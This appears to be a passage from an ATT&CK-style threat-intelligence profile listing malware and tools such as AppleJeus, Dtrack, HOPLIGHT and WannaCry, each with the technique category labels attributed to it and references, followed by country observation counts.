S0584 | AppleJeus | [11] | Abuse Elevation Control Mechanism: Bypass User Account Control; Application Layer Protocol: Web Protocols; Command and Scripting Interpreter: Unix Shell; Create or Modify System Process: Windows Service; Create or Modify System Process: Launch Daemon; Deobfuscate/Decode Files or Information; Event Triggered Execution: Installer Packages; Exfiltration Over C2 Channel; Hide Artifacts: Hidden Files and Directories; Indicator Removal: File Deletion; Obfuscated Files or Information; Phishing: Spearphishing Link; Scheduled Task/Job: Scheduled Task; Subvert Trust Controls: Code Signing; System Binary Proxy Execution: Msiexec; System Information Discovery; System Services: Launchctl; User Execution: Malicious Link; User Execution: Malicious File; Virtualization/Sandbox Evasion: Time Based Evasion
S0347 | AuditCred | [33] | Command and Scripting Interpreter: Windows Command Shell; Create or Modify System Process: Windows Service; Deobfuscate/Decode Files or Information; File and Directory Discovery; Indicator Removal: File Deletion; Ingress Tool Transfer; Obfuscated Files or Information; Process Injection; Proxy
S0245 | BADCALL | [34] | Data Obfuscation: Protocol Impersonation; Encrypted Channel: Symmetric Cryptography; Impair Defenses: Disable or Modify System Firewall; Modify Registry; Non-Standard Port; Proxy; System Information Discovery; System Network Configuration Discovery
S0239 | Bankshot | [28] | Access Token Manipulation: Create Process with Token; Account Discovery: Local Account; Account Discovery: Domain Account; Application Layer Protocol: Web Protocols; Automated Collection; Command and Scripting Interpreter: Windows Command Shell; Create or Modify System Process: Windows Service; Data Encoding: Non-Standard Encoding; Data from Local System; Data Obfuscation: Protocol Impersonation; Deobfuscate/Decode Files or Information; Exfiltration Over C2 Channel; Exploitation for Client Execution; File and Directory Discovery; Indicator Removal: Timestomp; Indicator Removal: File Deletion; Indicator Removal; Ingress Tool Transfer; Modify Registry; Native API; Non-Standard Port; Process Discovery; Query Registry; System Information Discovery
S0520 | BLINDINGCAN | [35] | Application Layer Protocol: Web Protocols; Command and Scripting Interpreter: Windows Command Shell; Data Encoding: Standard Encoding; Data from Local System; Deobfuscate/Decode Files or Information; Encrypted Channel: Symmetric Cryptography; Exfiltration Over C2 Channel; File and Directory Discovery; Indicator Removal: File Deletion; Indicator Removal: Timestomp; Ingress Tool Transfer; Masquerading: Match Legitimate Name or Location; Obfuscated Files or Information: Software Packing; Obfuscated Files or Information; Phishing: Spearphishing Attachment; Shared Modules; Subvert Trust Controls: Code Signing; System Binary Proxy Execution: Rundll32; System Information Discovery; System Network Configuration Discovery; User Execution: Malicious File
S0498 | Cryptoistic | [16] | Data from Local System; Encrypted Channel; File and Directory Discovery; Indicator Removal: File Deletion; Ingress Tool Transfer; Non-Application Layer Protocol; System Owner/User Discovery
S0497 | Dacls | [16][17] | Application Layer Protocol: Web Protocols; Create or Modify System Process: Launch Daemon; Create or Modify System Process: Launch Agent; File and Directory Discovery; Hide Artifacts: Hidden Files and Directories; Ingress Tool Transfer; Masquerading; Obfuscated Files or Information; Process Discovery
S0567 | Dtrack | [36] | Archive Collected Data; Boot or Logon Autostart Execution; Browser Bookmark Discovery; Command and Scripting Interpreter: Windows Command Shell; Create or Modify System Process: Windows Service; Data from Local System; Data Staged: Local Data Staging; Deobfuscate/Decode Files or Information; File and Directory Discovery; Hijack Execution Flow; Indicator Removal: File Deletion; Ingress Tool Transfer; Input Capture: Keylogging; Masquerading: Match Legitimate Name or Location; Obfuscated Files or Information: Embedded Payloads; Process Discovery; Process Injection: Process Hollowing; Query Registry; Shared Modules; System Information Discovery; System Network Configuration Discovery; System Network Connections Discovery; Valid Accounts
S0593 | ECCENTRICBANDWAGON | [37] | Command and Scripting Interpreter: Windows Command Shell; Data Staged: Local Data Staging; Indicator Removal: File Deletion; Input Capture: Keylogging; Obfuscated Files or Information; Screen Capture
S0181 | FALLCHILL | [30] | Create or Modify System Process: Windows Service; Data Obfuscation: Protocol Impersonation; Encrypted Channel: Symmetric Cryptography; File and Directory Discovery; Indicator Removal: File Deletion; Indicator Removal: Timestomp; System Information Discovery; System Network Configuration Discovery
S0246 | HARDRAIN | [38] | Command and Scripting Interpreter: Windows Command Shell; Data Obfuscation: Protocol Impersonation; Impair Defenses: Disable or Modify System Firewall; Non-Standard Port; Proxy
S0376 | HOPLIGHT | [5] | Command and Scripting Interpreter: Windows Command Shell; Data Encoding: Standard Encoding; Exfiltration Over C2 Channel; Fallback Channels; File and Directory Discovery; Impair Defenses: Disable or Modify System Firewall; Ingress Tool Transfer; Modify Registry; Non-Standard Port; OS Credential Dumping: Security Account Manager; Process Injection; Proxy; Query Registry; System Information Discovery; System Services: Service Execution; System Time Discovery; Use Alternate Authentication Material: Pass the Hash; Windows Management Instrumentation
S0431 | HotCroissant | [39] | Application Window Discovery; Command and Scripting Interpreter: Windows Command Shell; Encrypted Channel: Symmetric Cryptography; Exfiltration Over C2 Channel; File and Directory Discovery; Hide Artifacts: Hidden Window; Indicator Removal: File Deletion; Ingress Tool Transfer; Native API; Obfuscated Files or Information; Obfuscated Files or Information: Software Packing; Process Discovery; Scheduled Task/Job: Scheduled Task; Screen Capture; Service Stop; Software Discovery; System Information Discovery; System Network Configuration Discovery; System Owner/User Discovery; System Service Discovery
S0271 | KEYMARBLE | [40] | Command and Scripting Interpreter: Windows Command Shell; Encrypted Channel: Symmetric Cryptography; File and Directory Discovery; Indicator Removal: File Deletion; Ingress Tool Transfer; Modify Registry; Process Discovery; Screen Capture; System Information Discovery; System Network Configuration Discovery
S0108 | netsh | [22] | Event Triggered Execution: Netsh Helper DLL; Impair Defenses: Disable or Modify System Firewall; Proxy; Software Discovery: Security Software Discovery
S0238 | Proxysvc | [25] | Application Layer Protocol: Web Protocols; Automated Collection; Command and Scripting Interpreter: Windows Command Shell; Data Destruction; Data from Local System; Exfiltration Over C2 Channel; File and Directory Discovery; Indicator Removal: File Deletion; Process Discovery; Query Registry; System Information Discovery; System Network Configuration Discovery; System Services: Service Execution; System Time Discovery
S0241 | RATANKBA | [41] | Account Discovery: Local Account; Application Layer Protocol: Web Protocols; Command and Scripting Interpreter: PowerShell; Command and Scripting Interpreter: Windows Command Shell; Ingress Tool Transfer; Process Discovery; Process Injection: Dynamic-link Library Injection; Query Registry; Remote System Discovery; System Information Discovery; System Network Configuration Discovery; System Network Connections Discovery; System Owner/User Discovery; System Service Discovery; Windows Management Instrumentation
S0364 | RawDisk | [3][10] | Data Destruction; Disk Wipe: Disk Content Wipe; Disk Wipe: Disk Structure Wipe
S0174 | Responder | [13] | Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay; Network Sniffing
S0103 | route | [14] | System Network Configuration Discovery
S0586 | TAINTEDSCRIBE | [29] | Archive Collected Data; Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder; Command and Scripting Interpreter: Windows Command Shell; Data Obfuscation: Protocol Impersonation; Encrypted Channel: Symmetric Cryptography; Fallback Channels; File and Directory Discovery; Indicator Removal: File Deletion; Indicator Removal: Timestomp; Ingress Tool Transfer; Masquerading: Match Legitimate Name or Location; Obfuscated Files or Information: Binary Padding; Process Discovery; Remote System Discovery; System Information Discovery; System Time Discovery
S0665 | ThreatNeedle | [14] | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder; Create or Modify System Process: Windows Service; Data from Local System; Deobfuscate/Decode Files or Information; File and Directory Discovery; Ingress Tool Transfer; Masquerading: Match Legitimate Name or Location; Modify Registry; Obfuscated Files or Information; Phishing: Spearphishing Attachment; System Information Discovery; User Execution: Malicious File
S0678 | Torisma | [26] | Application Layer Protocol: Web Protocols; Data Encoding: Standard Encoding; Deobfuscate/Decode Files or Information; Encrypted Channel: Symmetric Cryptography; Execution Guardrails; Exfiltration Over C2 Channel; Native API; Obfuscated Files or Information: Software Packing; Obfuscated Files or Information; System Information Discovery; System Network Configuration Discovery; System Network Connections Discovery; System Time Discovery
S0263 | TYPEFRAME | [42] | Command and Scripting Interpreter: Visual Basic; Command and Scripting Interpreter: Windows Command Shell; Create or Modify System Process: Windows Service; Deobfuscate/Decode Files or Information; File and Directory Discovery; Impair Defenses: Disable or Modify System Firewall; Indicator Removal: File Deletion; Ingress Tool Transfer; Modify Registry; Non-Standard Port; Obfuscated Files or Information; Proxy; System Information Discovery; User Execution: Malicious File
S0180 | Volgmer | [43] | Command and Scripting Interpreter: Windows Command Shell; Create or Modify System Process: Windows Service; Deobfuscate/Decode Files or Information; Encrypted Channel: Symmetric Cryptography; Encrypted Channel: Asymmetric Cryptography; File and Directory Discovery; Indicator Removal: File Deletion; Ingress Tool Transfer; Masquerading: Masquerade Task or Service; Modify Registry; Native API; Obfuscated Files or Information; Process Discovery; Query Registry; System Information Discovery; System Network Configuration Discovery; System Network Connections Discovery; System Service Discovery
S0366 | WannaCry | [44][45][46][47] | Create or Modify System Process: Windows Service; Data Encrypted for Impact; Encrypted Channel: Asymmetric Cryptography; Exploitation of Remote Services; File and Directory Discovery; File and Directory Permissions Modification: Windows File and Directory Permissions Modification; Hide Artifacts: Hidden Files and Directories; Inhibit System Recovery; Lateral Tool Transfer; Peripheral Device Discovery; Proxy: Multi-hop Proxy; Remote Service Session Hijacking: RDP Hijacking; Remote System Discovery; Service Stop; System Network Configuration Discovery; Windows Management Instrumentation

Reports & References (2)

Observed Countries (11)

AR: 817
BG: 787
BR: 340
ES: 887
IN: 236
JP: 48
KP: 970
MX: 53
PH: 834
SG: 672
TR: 447